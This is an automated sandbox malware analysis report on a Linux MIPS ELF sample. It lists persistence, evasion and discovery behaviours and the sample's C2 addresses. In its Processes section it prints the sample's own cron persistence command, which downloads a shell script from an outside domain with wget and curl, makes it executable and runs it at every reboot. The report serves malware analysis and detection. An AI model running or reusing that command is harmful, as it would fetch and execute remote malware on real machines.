Malware Analysis Report

2024-11-13 15:54

Sample ID 241027-cv1n3stbnp
Target 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
SHA256 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb

Threat Level: Shows suspicious behavior

The file 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 02:24

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 02:24

Reported

2024-10-27 02:27

Platform

debian9-mipsbe-20240611-en

Max time kernel

143s

Max time network

140s

Command Line

[/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 70.34.254.19 N/A N/A
Destination IP 185.181.61.24 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.dQCYhx /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/sh /etc/init.d/rcS /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/mounts /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf N/A

Processes

/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf

[/tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
PL 70.34.254.19:53 kingstonwikkerink.dyn udp
NO 185.181.61.24:53 kingstonwikkerink.dyn udp
NO 81.29.149.178:22394 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.dQCYhx

MD5 f3ce9d7a4a91e5fd83d71554c65e28dd
SHA1 92f5357290d7c8b4d7f31552e22f6c0c7b2c1248
SHA256 31a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf
SHA512 11e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0